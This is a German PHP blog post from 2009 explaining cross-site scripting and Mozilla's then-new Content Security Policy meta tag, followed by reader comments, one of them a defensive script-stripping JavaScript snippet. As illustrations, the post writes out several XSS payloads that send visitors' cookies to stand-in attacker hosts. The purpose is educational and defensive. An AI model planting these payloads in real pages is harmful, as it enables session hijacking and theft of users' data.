PHPGangsta - Der praktische PHP Blog

PHP Blog von PHPGangsta


XSS-Angriffe erschweren mit CSP, der neuen Idee von Mozilla/Firefox

with 7 comments

Die Entwickler bei Mozilla haben hart gearbeitet und sich eine gute Strategie ausgedacht, wie man in Zukunft Cross-Site-Scripting (XSS) erschweren kann (Achtung: unterbinden wird man es (noch) nicht können!). Viele Browserhersteller loben die Firefox-Entwickler dafür und werden die Funktionalität auch einbauen, um das Web ein wenig sicherer zu machen.

XSS ist im Grunde das böse Einfügen von externem Javascript-Code, um im Kontext einer Webseite schädliche Funktionen aufzurufen. XSS-Angriffe haben in den letzten Jahren massiv zugenommen und sind mittlerweile auf Platz 1 der Hitliste aller Internet-Angriffe. Ein einfaches Beispiel ist das folgende:

Nehmen wir an, wir haben ein Gästebuch (oder ein Blog, einen Chat oder irgendeinen anderen Web 2.0 Dienst erstellt, wo User eigenen Content beisteuern können) programmiert, und wir haben bei der Programmierung nicht aufgepasst. Nehmen wir an, wir hätten auf Serverseite bei irgendeinem Formular-Script das Entschärfen der POST-Variablen vergessen, sodass alles, was ein User im Formular eingibt, später auf der Seite von anderen Usern gelesen werden kann.

Jemand, der uns Böses will, könnte nun also beispielsweise im Namensfeld folgendes eingeben:

Leo<script type="text/javascript">document.location="http://www.hacker.com/stealer.php?cookie=" + document.cookie;</script>

Diese Zeichenfolge wird nun in einer Datenbank gespeichert, und alle zukünftigen Benutzer finden dann zum Beispiel diesen Code, wenn sie die Seite besuchen:

<div id="name">Leo<script type="text/javascript">document.location="http://www.hacker.com/stealer.php?cookie=" + document.cookie;</script></div>

Bei jedem Besucher wird nun also der Javascript-Code ausgeführt, der den Cookie dieser Domain an den Server des Hackers schickt. Man könnte sich auch vorstellen, dass der Javascript-Code die Inhalte der Webseite (Kontostand, Freunde, private Einstellungen etc), die sich auf der Webseite befinden, via Javascript versendet. Das böse Javascript hat volle Kontrolle über das DOM.

Hier noch drei Beispiele:

<ahref="java script:document.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a>

<script>java script:getelementbyid("Boom").innerHTML="<iframe width=0 height=0 borderwidth=0 src='http://www.site.com/?c='+document.cookie+'&r='+document.location></iframe>";</script>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Hier gibt es eine unheimliche Sammlung, wie man Javascript „verstecken“ kann.

Als erstes sollte man natürlich alle Zeichen in HTML-Entities umwandeln mittels htmlentities(). Man sollte KEINEM UserContent vertrauen und es bestmöglich escapen und entschärfen. Das ist jedoch nicht immer ganz einfach, und auch wenn man selbst dran denkt, irgendwann kommt ein Azubi und vergisst es irgendwo bei einem neuen Feature, und schon ist die Seite bzw. deren Besucher angreifbar.

Der neue Ansatz ist nun, die Nutzung von Javascript auf seiner Seite zu kontrollieren bzw. verbieten zu können. Dazu gibt es einen neuen HTML-META-Tag, der das steuert: X-Content-Security-Policy

Mozilla hat es also Content-Security-Policy (CSP) getauft. Ein solcher Eintrag sieht zum Beispiel so aus:

<meta http-equiv="X-Content-Security-Policy" content="allow self" />

oder wenn Content auch von einigen wenigen externen Seiten erlaubt sein soll:

<meta http-equiv="X-Content-Security-Policy" content="allow self; img-src *; object-src media1.com media2.com; script-src userscripts.example.com" />

In diesem Fall wird Content nur erlaubt, wenn er von der selben Domain stammt, mit Ausnahme von Bildern, die überall liegen dürfen, Objects die nur von media1.com oder media2.com kommen dürfen, und externe Scripte, die nur von userscripts.example.com geladen werden dürfen. Damit kann man also, je strikter man ist, schon sehr vieles abfangen. Man rüstet sich außerdem für die Zukunft, wenn eventuell neue Sicherheitslücken gefunden werden. Man schützt seine Besucher also aktiv, denn man kann seinen Besuchern ja nicht empfehlen, Javascript zu deaktivieren, denn wir wollen es ja auch nutzen für unsere tolle Web 2.0 Seite.

CSP bietet auch die Möglichkeit, das Protokoll aller Links zu bestimmen, denn wenn man seine Seite komplett verschlüsselt anbietet, möchte man vermeiden, dass Cracker Links einschmuggeln, die nicht verschlüsselt aufgerufen werden. Man verschlüsselt ja die Verbindung, um Mithörern den Inhalt nicht zu verraten. Einige Man-in-the-Middle-Attacken schaffen es aber, Links einzuschleusen, sodass plötzlich einige Links/Requests unverschlüsselt über den Äther gehen, und der Angreifer dann zB die Cookies mitschneiden könnte.

Es gab vor einiger Zeit auch eine Lücke in Javascript, über die ein Cracker herausfinden konnte, ob man auf bestimmten Seiten war. Dazu werden einfach verschiedene Links unsichtbar generiert, und mit Hilfe von CSS und Javascript geprüft, ob der Browser die Links beispielsweise pink anzeigt, wie es einige Browsern bei bereits besuchten URLs macht. Hier gibt es Details und Beispielcode. Mit Javascript ist also viel möglich, und es werden in Zukunft sicher noch weitere Lücken entdeckt und ausgenutzt. Deshalb ist es wichtig, XSS zu verhindern.

CSP bietet auch die Möglichkeit zu bestimmen, dass die eigene Seite nie in einem Frame angezeigt werden darf. Das ist auch häufig gewünscht, um „Content-Dieben“ das Leben schwerer zu machen.

Man wird außerdem dazu „gezwungen“, keinen Inline-Javascript mehr zu schreiben, sondern Javascript schön in externe Javascript-Dateien zu packen, was sowieso besserer Stil ist und bevorzugt werden sollte (Trennung Präsentations-Markup von Script-Funktionalität).Da kein Inline-Javascript mehr ausgeführt wird, sobald man den Header setzt, sondern nur noch Javascript aus den vertrauenswürdigen Quellen geladen wird, kann es relativ umfangreich sein, bei alten Webseiten die viel mit Inline-Javascript arbeiten, dies umzustellen. Aber wahrscheinlich ist es den Aufwand wert, denn es steigert die Sicherheit der Seite ungemein.

CSP hat noch die „Nebeneffekte“ bzw. sekundären Ziele, Clickjacking und Packet-Sniffing zu unterbinden. Clickjacking ist das Einblenden von transparenten Frames, um den User dazu zu bringen, auf eine bestimmte Stelle zu klicken und damit möglicherweise nicht gewollte Aktionen auszuführen. Es gab auch Angriffe, die ein Flash-Applet eingebaut haben, das auf das Microphone und die Webcam zugreifen wollten. Die Cracker konnten mit Hilfe von Javascript und CSS diese Abfrage von Flash nahezu unsichtbar machen, und egal wo man hinklickt, der unsichtbare „Erlauben“ Knopf befindet sich immer unter der Maus. Plötzlich sendet man also, ohne dass man das möchte, sein Webcam-Bild und Audio an eine fremde Seite. Hier gibt es dazu weitere Details und ein Video. Mehr dazu hier in den Zielen von CSP. Übrigens, wenn ein Browser CSP noch nicht versteht, ignoriert er den META-Tag einfach. Es hat also keine Nachteile es zu aktivieren, und man verliert keine Besucher oder muss umfangreiche Browserweichen einbauen.

Wo es Licht gibt, gibt es auch Schatten. Durch Man-in-the-Middle-Attacken bei unverschlüsselten Verbindungen könnte es auch sein, dass Header-Injection-Angriffe in Zukunft zunehmen werden. Damit wollen Angreifer den CSP-Header entfernen oder verändern. Außerdem wird es auf lange Zeit noch Browser geben, die den META-Tag nicht verstehen, es ist also Pflicht, nach wie vor XSS aktiv zu vermeiden und zu bekämpfen, und sich nicht auf den neuen META-Tag zu verlassen.

Das offiziele Paper dazu findet ihr auf den Mozilla-Seiten, inclusive ausführlicher Beschreibungen, Demos und einem Firefox-Build mit der neuen Funktionalität zum Testen. Mit Firefox 3.6 oder 3.7 wird es offiziell verbreitet werden, sobald die letzten Funktionalitäten eingebaut sind.

Es soll auch einen Origin-Header geben, der Cross-Site-Request-Forgery unterbinden soll. Details dazu hier auch wieder bei Mozilla.

Wir können uns also darauf freuen und hoffen, dass die großen Browser es bald einbauen werden, und das Web ein Stück sicherer wird.

Written by Michael Kliewe

November 19th, 2009 at 12:25 am

7 Responses to 'XSS-Angriffe erschweren mit CSP, der neuen Idee von Mozilla/Firefox'

Subscribe to comments with RSS or TrackBack to 'XSS-Angriffe erschweren mit CSP, der neuen Idee von Mozilla/Firefox'.

  1. […] Dieser Eintrag wurde auf Twitter von Michael Kliewe, Demobereich erwähnt. Demobereich sagte: Unsere Empfehlung: XSS-Angriffe erschweren mit CSP auf PHP Gangsta: http://bit.ly/3Dii7W #csp #xss #javascript #hacker […]

  2. Social comments and analytics for this post…

    This post was mentioned on Twitter by PHPGangsta: Neuer Blogeintrag: XSS-Angriffe erschweren mit CSP, der neuen Idee von Mozilla/Firefox https://www.phpgangsta.de/600

  3. das ist lila oder wegen mir auch violett – aber bestimmt kein pink 😉

    Martin

    19 Nov. 09 at 17:05

  4. Das hängt von der Sonnenbrille ab, die man trägt…

    Michael Kliewe

    19 Nov. 09 at 17:09

  5. Kuhle Sache! Danke! 🙂

    Phil

    20 Nov. 09 at 00:27

  6. /* Abwehr gegen Fremdskripte auch auf verseuchten Rechnern */
    // (c) TV1 Realitäts- & Mediendesign, 82433 Bad Kohlgrub

    function JSCheck () {
    for (i=0;i<document.getElementsByTagName('script').length;i++) {
    if (document.getElementsByTagName('script')[i].getAttribute('src') != 'wanzenkiller.js')
    document.getElementsByTagName('script')[i].removeAttribute('src')
    }
    with (document.getElementsByTagName('head')[0]) {
    for (i=0;i<childNodes.length;i++) {
    if (childNodes[i].nodeName.toLowerCase() == 'script' && childNodes[i].getAttribute('src') != 'wanzenkiller.js')
    removeChild(childNodes[i])
    }
    }
    with (document.getElementsByTagName('body')[0]) {
    for (i=lastElement();i<childNodes.length;i++) {
    removeChild(childNodes[i])
    }
    removeAttribute('style');
    }
    with (document.getElementsByTagName('html')[0]) {
    for (i=0;i<childNodes.length;i++) {
    if (childNodes[i].nodeName.toLowerCase() != 'head' && childNodes[i].nodeName.toLowerCase() != 'body')
    removeChild(childNodes[i]);
    }
    removeAttribute('class');
    }
    }
    function lastElement() {
    with (document.getElementsByTagName('body')[0]) {
    for (c=0;c<childNodes.length;c++)
    if (childNodes.nodeType == 1 && childNodes.getAttribute('id') == 'WanzenKiller') return c+1
    }
    }
    function TimeOut() {
    document.getElementsByTagName('body')[0].appendChild(document.createElement('div')).setAttribute('id','WanzenKiller')
    JSCheck();
    KillJS = setInterval("JSCheck()",20);
    setTimeout("clearInterval("+KillJS+")",20000);
    setTimeout("with (document.getElementsByTagName('body')[0]) removeChild(lastChild)",20001);
    setTimeout("clearSelf()",20002);
    }
    function clearSelf() {
    with (document.getElementsByTagName('head')[0])
    for (i=0;i<childNodes.length;i++)
    if (childNodes[i].nodeName.toLowerCase() == 'script' && childNodes[i].getAttribute('src') == 'wanzenkiller.js')
    removeChild(childNodes[i])
    }

    setTimeout("JSCheck()",5)

    onload = TimeOut;

    WanzenKiller

    22 Jan. 13 at 10:22

  7. Anmerkung:

    In der vorliegenden Form duldet das Wanzenkiller-Script überhaupt keine Scripts, muss als ‚wanzenkiller.js‘ im Verzeichnis liegen und „erschießt“ sich zuletzt selbst…

    🙂

    WanzenKiller

    22 Jan. 13 at 10:27

Leave a Reply

You can add images to your comment by clicking here.